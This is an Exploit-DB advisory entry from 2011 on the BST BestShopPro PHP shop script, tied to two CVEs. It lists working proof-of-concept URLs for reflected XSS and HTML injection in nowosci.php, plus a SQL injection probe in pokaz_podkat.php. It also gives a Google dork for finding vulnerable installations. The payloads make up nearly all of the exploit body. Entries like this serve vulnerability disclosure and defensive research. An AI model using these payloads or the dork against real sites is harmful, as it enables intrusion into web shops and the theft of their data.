BST - BestShopPro nowosci.php Multiple Vulnerabilities

2011-11-02T00:00:00
ID EDB-ID:18063
Type exploitdb
Reporter CoBRa_21
Modified 2011-11-02T00:00:00

Description

BST - BestShopPro (nowosci.php) Multiple Vulnerabilities. CVE-2011-4811,CVE-2011-4812. Webapps exploit for php platform

                                        
                                            ################################################################################################
#  Exploit Title: BST - BestShopPro (nowosci.php) Multiple Vulnerabilities
#
#  Author : CoBRa_21 
#
#  E-Mail : uyku_cu [at] windowslive.com
#
#  Google Dork : "Powered By BST"
#
#  Script Page : http://www.bst.pl
################################################################################################
#
#  XSS:
#
#  http://127.0.0.1/nowosci.php?a=1&str=<script>alert(/CoBRa_21/)</script>
#
#  HTML:
#
#  http://127.0.0.1/nowosci.php?a=1&str=<font color=red size=15>CoBRa_21</font>
#
#  SQL :
#
#  http://127.0.0.1/pokaz_podkat.php?idkat=10&order1=1&str=' (SQL)
#
################################################################################################